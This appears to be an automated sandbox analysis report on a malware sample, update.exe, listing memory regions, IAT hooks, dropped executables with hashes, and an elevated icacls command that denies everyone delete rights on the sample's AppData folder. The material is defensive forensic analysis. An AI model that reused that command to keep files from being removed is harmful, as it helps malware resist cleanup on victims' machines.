private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	rw	-
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd6fff	Private Memory	rw	-
private_0x000007fffffd7000	0x7fffffd7000	0x7fffffd7fff	Private Memory	rw	-
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	rw	-
private_0x000007fffffda000	0x7fffffda000	0x7fffffdbfff	Private Memory	rw	-
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	rw	-

Process #3: icacls.exe

Information	Value
ID	#3
File Name	c:\windows\syswow64\icacls.exe
Command Line	icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:41, Reason: Child Process
Unmonitor	End Time: 00:00:42, Reason: Self Terminated
Monitor Duration	00:00:01
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x8f0
Parent PID	0x8dc (c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 8F4 0x 8F8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	rw	-
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	r	-
private_0x00000000001b0000	0x001b0000	0x001bffff	Private Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x0020ffff	Private Memory	rw	-
private_0x00000000002a0000	0x002a0000	0x002dffff	Private Memory	rw	-
private_0x00000000003d0000	0x003d0000	0x0044ffff	Private Memory	rw	-
private_0x00000000004e0000	0x004e0000	0x0051ffff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0070ffff	Private Memory	rw	-
icacls.exe	0x00860000	0x00869fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
ntmarta.dll	0x750c0000	0x750e0fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Process #4: update.exe

985

423

Information	Value
ID	#4
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:41, Reason: Child Process
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:22

OS Process Information

Information	Value
PID	0x904
Parent PID	0x8dc (c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 908 0x 90C 0x 910 0x 914 0x 918 0x 91C 0x 920 0x 924 0x 928 0x 934 0x 9B0 0x 9C4 0x 9C8 0x 9D4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a4fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	rw	-
private_0x00000000001b0000	0x001b0000	0x0022ffff	Private Memory	rw	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	r	-
private_0x0000000000240000	0x00240000	0x0033ffff	Private Memory	rw	-
locale.nls	0x00340000	0x003a6fff	Memory Mapped File	r	-
private_0x00000000003b0000	0x003b0000	0x003cffff	Private Memory	rw	-
windowsshell.manifest	0x003b0000	0x003b0fff	Memory Mapped File	r	-
index.dat	0x003b0000	0x003bffff	Memory Mapped File	rw	-
private_0x00000000003c0000	0x003c0000	0x003cffff	Private Memory	rw	-
pagefile_0x00000000003d0000	0x003d0000	0x003d1fff	Pagefile Backed Memory	r	-
index.dat	0x003e0000	0x003e7fff	Memory Mapped File	rw	-
index.dat	0x003f0000	0x003fffff	Memory Mapped File	rw	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000004a0000	0x004a0000	0x004eefff	Private Memory	rw	-
private_0x00000000004a0000	0x004a0000	0x005bffff	Private Memory	rw	-
private_0x00000000004a0000	0x004a0000	0x004dffff	Private Memory	rw	-
private_0x00000000004e0000	0x004e0000	0x0051ffff	Private Memory	rw	-
rsaenh.dll	0x00520000	0x0055bfff	Memory Mapped File	r	-
private_0x0000000000520000	0x00520000	0x0055ffff	Private Memory	rw	-
private_0x0000000000560000	0x00560000	0x0059ffff	Private Memory	rw	-
private_0x00000000005a0000	0x005a0000	0x005a0fff	Private Memory	rw	-
pagefile_0x00000000005a0000	0x005a0000	0x005a0fff	Pagefile Backed Memory	r	-
private_0x00000000005b0000	0x005b0000	0x005bffff	Private Memory	rw	-
private_0x00000000005c0000	0x005c0000	0x005fffff	Private Memory	rw	-
pagefile_0x0000000000600000	0x00600000	0x00600fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000610000	0x00610000	0x00610fff	Pagefile Backed Memory	r	-
private_0x0000000000620000	0x00620000	0x0062ffff	Private Memory	rw	-
pagefile_0x0000000000630000	0x00630000	0x007b7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007c0000	0x007c0000	0x00940fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000950000	0x00950000	0x01d4ffff	Pagefile Backed Memory	r	-
private_0x0000000001d50000	0x01d50000	0x01f1ffff	Private Memory	rw	-
private_0x0000000001d50000	0x01d50000	0x01e4ffff	Private Memory	rw	-
private_0x0000000001e50000	0x01e50000	0x01e8ffff	Private Memory	rw	-
private_0x0000000001e90000	0x01e90000	0x01ecffff	Private Memory	rw	-
pagefile_0x0000000001ed0000	0x01ed0000	0x01ed0fff	Pagefile Backed Memory	rw	-
private_0x0000000001ee0000	0x01ee0000	0x01f1ffff	Private Memory	rw	-
private_0x0000000001f20000	0x01f20000	0x0213ffff	Private Memory	rw	-
private_0x0000000001f20000	0x01f20000	0x0201ffff	Private Memory	rw	-
private_0x0000000002020000	0x02020000	0x0205ffff	Private Memory	rw	-
private_0x0000000002060000	0x02060000	0x0209ffff	Private Memory	rw	-
pagefile_0x00000000020a0000	0x020a0000	0x020a6fff	Pagefile Backed Memory	r	-
private_0x00000000020b0000	0x020b0000	0x020bffff	Private Memory	rw	-
private_0x00000000020c0000	0x020c0000	0x020fffff	Private Memory	rw	-
private_0x0000000002100000	0x02100000	0x0213ffff	Private Memory	rw	-
sortdefault.nls	0x02140000	0x0240efff	Memory Mapped File	r	-
private_0x0000000002410000	0x02410000	0x0860ffff	Private Memory	rw	-
private_0x0000000008610000	0x08610000	0x0e80ffff	Private Memory	rw	-
private_0x000000000e810000	0x0e810000	0x0e90ffff	Private Memory	rw	-
private_0x000000000e910000	0x0e910000	0x0ea0ffff	Private Memory	rw	-
private_0x000000000ea10000	0x0ea10000	0x0eb0ffff	Private Memory	rw	-
private_0x000000000eb10000	0x0eb10000	0x0ec0ffff	Private Memory	rw	-
private_0x000000000ec10000	0x0ec10000	0x0ed0ffff	Private Memory	rw	-
private_0x000000000ed10000	0x0ed10000	0x0ed2ffff	Private Memory	rw	-
private_0x000000000ede0000	0x0ede0000	0x0edeffff	Private Memory	rw	-
private_0x000000000edf0000	0x0edf0000	0x0eeeffff	Private Memory	rw	-
version.dll	0x74af0000	0x74af8fff	Memory Mapped File	rwx	-
dhcpcsvc6.dll	0x74b00000	0x74b0cfff	Memory Mapped File	rwx	-
npmproxy.dll	0x74b10000	0x74b17fff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x74b20000	0x74b2dfff	Memory Mapped File	rwx	-
netprofm.dll	0x74b30000	0x74b89fff	Memory Mapped File	rwx	-
fwpuclnt.dll	0x74b90000	0x74bc7fff	Memory Mapped File	rwx	-
rasadhlp.dll	0x74bd0000	0x74bd5fff	Memory Mapped File	rwx	-
wship6.dll	0x74be0000	0x74be5fff	Memory Mapped File	rwx	-
wshtcpip.dll	0x74bf0000	0x74bf4fff	Memory Mapped File	rwx	-
winrnr.dll	0x74c00000	0x74c07fff	Memory Mapped File	rwx	-
mswsock.dll	0x74c10000	0x74c4bfff	Memory Mapped File	rwx	-
pnrpnsp.dll	0x74c50000	0x74c61fff	Memory Mapped File	rwx	-
napinsp.dll	0x74c70000	0x74c7ffff	Memory Mapped File	rwx	-
rasapi32.dll	0x74c80000	0x74cd1fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
nlaapi.dll	0x74e40000	0x74e4ffff	Memory Mapped File	rwx	-
sensapi.dll	0x74e50000	0x74e55fff	Memory Mapped File	rwx	-
rtutils.dll	0x74e60000	0x74e6cfff	Memory Mapped File	rwx	-
rasman.dll	0x74e70000	0x74e84fff	Memory Mapped File	rwx	-
ntmarta.dll	0x74e90000	0x74eb0fff	Memory Mapped File	rwx	-
comctl32.dll	0x74ec0000	0x7505dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x75060000	0x7509afff	Memory Mapped File	rwx	-
cryptsp.dll	0x750a0000	0x750b5fff	Memory Mapped File	rwx	-
dhcpcsvc.dll	0x750c0000	0x750d1fff	Memory Mapped File	rwx	-
msvcr100.dll	0x750e0000	0x7519efff	Memory Mapped File	rwx	-
dnsapi.dll	0x751a0000	0x751e3fff	Memory Mapped File	rwx	-
winnsi.dll	0x751f0000	0x751f6fff	Memory Mapped File	rwx	-
profapi.dll	0x75200000	0x7520afff	Memory Mapped File	rwx	-
winmm.dll	0x75210000	0x75241fff	Memory Mapped File	rwx	-
mpr.dll	0x75250000	0x75261fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75270000	0x7528bfff	Memory Mapped File	rwx	-
msimg32.dll	0x75290000	0x75294fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
iertutil.dll	0x757f0000	0x759eafff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
normaliz.dll	0x75bd0000	0x75bd2fff	Memory Mapped File	rwx	-
wininet.dll	0x75be0000	0x75cd4fff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
crypt32.dll	0x76190000	0x762acfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
urlmon.dll	0x762e0000	0x76415fff	Memory Mapped File	rwx	-
psapi.dll	0x76420000	0x76424fff	Memory Mapped File	rwx	-
ws2_32.dll	0x764c0000	0x764f4fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
msasn1.dll	0x772c0000	0x772cbfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
nsi.dll	0x77820000	0x77825fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x00000000fff9b000	0xfff9b000	0xfff9dfff	Private Memory	rw	-
private_0x00000000fff9e000	0xfff9e000	0xfffa0fff	Private Memory	rw	-
private_0x00000000fffa1000	0xfffa1000	0xfffa3fff	Private Memory	rw	-
private_0x00000000fffa4000	0xfffa4000	0xfffa6fff	Private Memory	rw	-
private_0x00000000fffa7000	0xfffa7000	0xfffa9fff	Private Memory	rw	-
private_0x00000000fffaa000	0xfffaa000	0xfffacfff	Private Memory	rw	-
private_0x00000000fffad000	0xfffad000	0xfffaffff	Private Memory	rw	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffd5000	0xfffd5000	0xfffd7fff	Private Memory	rw	-
private_0x00000000fffd8000	0xfffd8000	0xfffdafff	Private Memory	rw	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-
For performance reasons, the remaining 39 entries are omitted. The remaining entries can be found in flog.txt.

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000240000:+0x1343f	13. entry of update.exe	4 bytes	kernel32.dll:GetCommProperties+0x0 now points to pagefile_0x0000000000630000:+0x7006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	14. entry of update.exe	4 bytes	kernel32.dll:GetThreadSelectorEntry+0x0 now points to pagefile_0x0000000000950000:+0x5277e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	18. entry of update.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x25d7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	21. entry of update.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to pagefile_0x0000000000630000:+0x7006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	22. entry of update.exe	4 bytes	kernel32.dll:CompareStringW+0x0 now points to pagefile_0x0000000000950000:+0x52c7e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	24. entry of update.exe	4 bytes	kernel32.dll:GetLocaleInfoW+0x0 now points to pagefile_0x0000000000950000:+0xe0043	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	26. entry of update.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x25b7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	37. entry of update.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000950000:+0x1f8be8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000240000:+0x1343f	64. entry of update.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000950000:+0xde8d56	... Actions Go to Installer Region Go to Target Region

Created Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\desktop.ini	0.39 KB	MD5: 573c4619283bea55f656418e7a47ef9e SHA1: 379b24e22bc849ea329b64b550e58ce04bfd7fc7 SHA256: 55726745cfb18de18b1e5d3538663389b1dfb63e1e779af5c8714ff8806b6f1a SSDeep: 12:ilZ9RF+tHms0asc9uG8X09wgkvhHp6rD6QlJZd:il32hsPTX3gkpHiflJZd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\desktop.ini	0.39 KB	MD5: 6f13f9a17e32b7ea7ecc13cce3c4cb03 SHA1: a195f790f49ff3b7bf2b8a4cff4719f033712c24 SHA256: 3695731322c04a7865076febcc41955cf80dc77b456d4f97ac4e66d1270ebac6 SSDeep: 12:ilZ9RF+tHms0asc9uG8X09f2kvhHp6rD6Qled:il32hsPTXtkpHifled	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\desktop.ini	0.28 KB	MD5: 436b5c9eda5f59dd3ba6cb306e72ef19 SHA1: d159de7699ba26507f9ccdabd10a9af1085a591d SHA256: 0d69074af3649d15488c9a581c0636cafeaf1441cc4036f4967545e4214eeed0 SSDeep: 6:Chp3bZ9tz20guqtHO7oxR+asti5K59q5GYigX1OPlL:ilZ9RF+tHms0astiA9uG8X09L	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Searches\desktop.ini	0.51 KB	MD5: d5e80eef3f50fb317b6eed39ea0aee8a SHA1: 637b72b3ae9fa509e8e30f2d7ffae40eaf73efbf SHA256: 0aa3a0e5032b595baaef93c36660b8569ce2a626524e505dfca9a692257863f8 SSDeep: 12:ilZ9RF+tHms0a8T3NxnmUYq409jxdnr0KGhKS9P1x2hc4vv:il32h8TTz4GdngfP10hcSv	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\desktop.ini	0.49 KB	MD5: cd9b253f57aec6718a63f6cb1cccf4ad SHA1: 7735b4c1c3bd3cc059d1ca8f144c0f21de6a3e0a SHA256: 2a255b315f7980bd5191f91e7d9505e2cf3ab241184f6899dfd99439f5029711 SSDeep: 12:ilZ9RF+tHms0asKmkNKZK0Le+qYGRO6Pc1q3NEWSw:il32hsVU0iHcs3WWz	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\desktop.ini	0.49 KB	MD5: 05c0e2fd98e1c027872e8d83d19f33bf SHA1: 7ded9a4a157b7c3f7dcdd8a7196427ad564053f8 SHA256: dba439916406e7161bfb73a79357414a3b17b2663263359acc2b7d2a5b7cf755 SSDeep: 12:ilZ9RF+tHms0ascmkNc0Le+qYG8e16Pc1q3NEWS+:il32hsZ0KAcs3WWx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe	180.50 KB	MD5: 3aebd4ff369d3a09905a73b94d83cd69 SHA1: 4528b882dafcbd5039f3c6cef1ebc54a23855e8a SHA256: 362209793fe1f5a3bd006639ed8ca3ed1315823bbb36557ed5546109ae181b21 SSDeep: 3072:S5mBBAQLszJ0dYqqnSDCYi/v2rwXxMTAIC91+Z:SIBBgtVSQxGA0Z	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Links\desktop.ini	0.57 KB	MD5: 9a13388d39edf84eec1b5d5af41f96b1 SHA1: 5b00ae3fbdc0c32de83c3ce2a1493a70cdd3cebf SHA256: 6bbe6d1f1cb399732f360661c658fee6bf0ffd0aec7934918d5948345b97b897 SSDeep: 12:ilZ9RF+tHms0astiM9uG8X09MbQggUC5+u5f2K/YfMsSyY9rAYwFtiljA7ey:il32hsaTXdDmku9GfSyY9rFwFtL7R	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe	128.00 KB	MD5: 71f57d369f6b570521cecafe57685ac1 SHA1: b271e976c42233872cccbbb8bffb9baa0f148578 SHA256: 827116c338d4521729ec25d67c2a7acaf1295922de828f600d3dd4a41d001d22 SSDeep: 3072:R5gPfJ0y76KyOoUjLFfiDo6YKV8aW2DW26JF:R5gPDmpgbS8axDx6F	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\desktop.ini	0.49 KB	MD5: 5709f46fc5404967b760e238fc183c9a SHA1: d55329fe74d71df6487e9d35245cefed8a78ea3f SHA256: d50793f8ebfd65fcaf16430ab326c4a786aa23f1910d6744c20101578b3566b7 SSDeep: 12:ilZ9RF+tHms0as3mkNF0Le+qYGQO6Pc1q3NEWSJUs:il32hsX0Lcs3WW0v	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe	182.00 KB	MD5: 6f1afdaef8479275a54a64ae20a3e505 SHA1: 811506c83addd943da13257c831be25288614ff7 SHA256: dd312fbc6f5ad4b04841a2636b6bbf2d75ca73dcf7fd32f5a3c710ce5116fb5c SSDeep: 3072:xLhuMU5azUoeYUbMZdislQRnm97Czjw3:xLhG1Zg0m90E3	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\desktop.ini	0.40 KB	MD5: 9095947b4accd8e7cc8d4ee798c45667 SHA1: d5fa56c198f021eacafa7dccc135837956e734e7 SHA256: 4feafa99292984e5f6eb37b2b2ce8eacc103a5f89fd7866d25e34a912756160e SSDeep: 6:Chp3bZ9tz20guqjlcYlP2M3haJa4pYBITHW3mVkTCEAV6KthnNa3hYN7GNZH:ilZ9RF+9tcw4pYBIT+OE46Kthnc3nL	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Downloads\desktop.ini	0.28 KB	MD5: 3cc774c46b7f0f5d4024736f90ffeb22 SHA1: ab6c40da423a8a3e662eb7a8d4b4323191466c9d SHA256: a6148c8700f56f60e8005c9def160b887352dde74ff01fdd4f6fb5ad8f60c760 SSDeep: 6:Chp3bZ9tz20guqtHO7oxR+asK59q5GYigX1OPl02n:ilZ9RF+tHms0asq9uG8X0902	... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\desktop.ini	0.39 KB	MD5: 573c4619283bea55f656418e7a47ef9e SHA1: 379b24e22bc849ea329b64b550e58ce04bfd7fc7 SHA256: 55726745cfb18de18b1e5d3538663389b1dfb63e1e779af5c8714ff8806b6f1a SSDeep: 12:ilZ9RF+tHms0asc9uG8X09wgkvhHp6rD6QlJZd:il32hsPTX3gkpHiflJZd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\desktop.ini	0.39 KB	MD5: 6f13f9a17e32b7ea7ecc13cce3c4cb03 SHA1: a195f790f49ff3b7bf2b8a4cff4719f033712c24 SHA256: 3695731322c04a7865076febcc41955cf80dc77b456d4f97ac4e66d1270ebac6 SSDeep: 12:ilZ9RF+tHms0asc9uG8X09f2kvhHp6rD6Qled:il32hsPTXtkpHifled	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\desktop.ini	0.28 KB	MD5: 436b5c9eda5f59dd3ba6cb306e72ef19 SHA1: d159de7699ba26507f9ccdabd10a9af1085a591d SHA256: 0d69074af3649d15488c9a581c0636cafeaf1441cc4036f4967545e4214eeed0 SSDeep: 6:Chp3bZ9tz20guqtHO7oxR+asti5K59q5GYigX1OPlL:ilZ9RF+tHms0astiA9uG8X09L	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Searches\desktop.ini	0.51 KB	MD5: d5e80eef3f50fb317b6eed39ea0aee8a SHA1: 637b72b3ae9fa509e8e30f2d7ffae40eaf73efbf SHA256: 0aa3a0e5032b595baaef93c36660b8569ce2a626524e505dfca9a692257863f8 SSDeep: 12:ilZ9RF+tHms0a8T3NxnmUYq409jxdnr0KGhKS9P1x2hc4vv:il32h8TTz4GdngfP10hcSv	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\desktop.ini	0.49 KB	MD5: cd9b253f57aec6718a63f6cb1cccf4ad SHA1: 7735b4c1c3bd3cc059d1ca8f144c0f21de6a3e0a SHA256: 2a255b315f7980bd5191f91e7d9505e2cf3ab241184f6899dfd99439f5029711 SSDeep: 12:ilZ9RF+tHms0asKmkNKZK0Le+qYGRO6Pc1q3NEWSw:il32hsVU0iHcs3WWz	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\desktop.ini	0.49 KB	MD5: 05c0e2fd98e1c027872e8d83d19f33bf SHA1: 7ded9a4a157b7c3f7dcdd8a7196427ad564053f8 SHA256: dba439916406e7161bfb73a79357414a3b17b2663263359acc2b7d2a5b7cf755 SSDeep: 12:ilZ9RF+tHms0ascmkNc0Le+qYG8e16Pc1q3NEWS+:il32hsZ0KAcs3WWx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Links\desktop.ini	0.57 KB	MD5: 9a13388d39edf84eec1b5d5af41f96b1 SHA1: 5b00ae3fbdc0c32de83c3ce2a1493a70cdd3cebf SHA256: 6bbe6d1f1cb399732f360661c658fee6bf0ffd0aec7934918d5948345b97b897 SSDeep: 12:ilZ9RF+tHms0astiM9uG8X09MbQggUC5+u5f2K/YfMsSyY9rAYwFtiljA7ey:il32hsaTXdDmku9GfSyY9rFwFtL7R	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\desktop.ini	0.49 KB	MD5: 5709f46fc5404967b760e238fc183c9a SHA1: d55329fe74d71df6487e9d35245cefed8a78ea3f SHA256: d50793f8ebfd65fcaf16430ab326c4a786aa23f1910d6744c20101578b3566b7 SSDeep: 12:ilZ9RF+tHms0as3mkNF0Le+qYGQO6Pc1q3NEWSJUs:il32hsX0Lcs3WW0v	... File Actions Show Properties Download
